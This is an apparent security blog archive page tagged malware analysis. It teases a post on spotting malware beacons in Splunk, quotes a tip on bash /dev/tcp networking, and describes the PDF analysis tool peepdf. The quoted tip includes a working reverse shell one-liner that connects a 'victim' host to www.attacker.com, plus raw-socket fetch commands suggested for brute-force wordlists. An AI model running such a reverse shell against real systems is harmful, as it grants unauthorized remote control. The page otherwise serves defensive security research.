Tag Archives: Malware Analysis

Detecting malware beacons using Splunk

mouseover outlier barsNote: Although this was created some time back (sorry for sharing this so late), there’re improvements to be made still.  Discussions are always welcomed.

When responding to an enterprise network compromise, one big question (and source of pressure) is that network IOCs need to be determined quickly. While this information would usually come from the malwares/tools used in the compromise, the fact that the surfacing of network IOCs and triaging being done in parallel presents a Catch-22 situation: How do we find machines and malware without network IOCs available? How do we get network IOCs without analyzing any machines/malware suspects?
Continue reading Detecting malware beacons using Splunk

Advertisements

Interesting Links

Will start linking some of the stuff that potentially would be interesting and useful here.  Let’s start off with an alternative BASH-fu technique to initiate and listen TCP connections from a (supposedly pwned) Linux box:

http://blog.rootshell.be/2011/05/05/binbash-phone-home/

Now the question will arise: when those network redirection could be helpful? First, bash can used without third party tools to grab data from the network. The example below fetch this blog main page:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0nn" >&5
  cat <&5
  exec 5>&-

Very convenient if you don’t have link or curl installed. Just pipe the output to other commands. This can be used to generate dictionary files to conduct a bruteforce attack:

  exec 5<> /dev/tcp/blog.rootshell.be/80
  printf "GET / HTTP/1.0nn" >&5
  cat <&5
  exec 5>&- | sed -e 's/<[!a-zA-Z/][^>]*>//g' foo.tmp | tr " " "n"

Another nice example is to make bash “phone home”. Let’s launch a reverse shell to an attacker box:

  victim# bash 0</dev/tcp/www.attacker.com/8888 1>&0 2>&0

As the bash shell is very common, it can be very interesting! Just use your imagination. to find other examples. A final remark: this feature is not available on all pre-compiled or packaged bash instances! Some UNIX flavors consider it as dangerous (which is true!). If you want to compile your own bash with this feature enabled, the configuration flag is “–enable-net-redirections“.

Also, a tool to help with PDF creation/modification/analysis.  Sounds promising:

http://code.google.com/p/peepdf/

peepdf is a Python tool to explore PDF files in order to find out if the file can be harmful or not. The aim of this tool is to provide all the necessary components that a security researcher could need in a PDF analysis without using 3 or 4 tools to make all the tasks. With peepdf it’s possible to see all the objects in the document showing the suspicious elements, supports all the most used filters and encodings, it can parse different versions of a file, object streams and encrypted files. With the installation of Spidermonkey and Libemu it provides Javascript and shellcode analysis wrappers too. Apart of this it’s able to create new PDF files and to modify existent ones.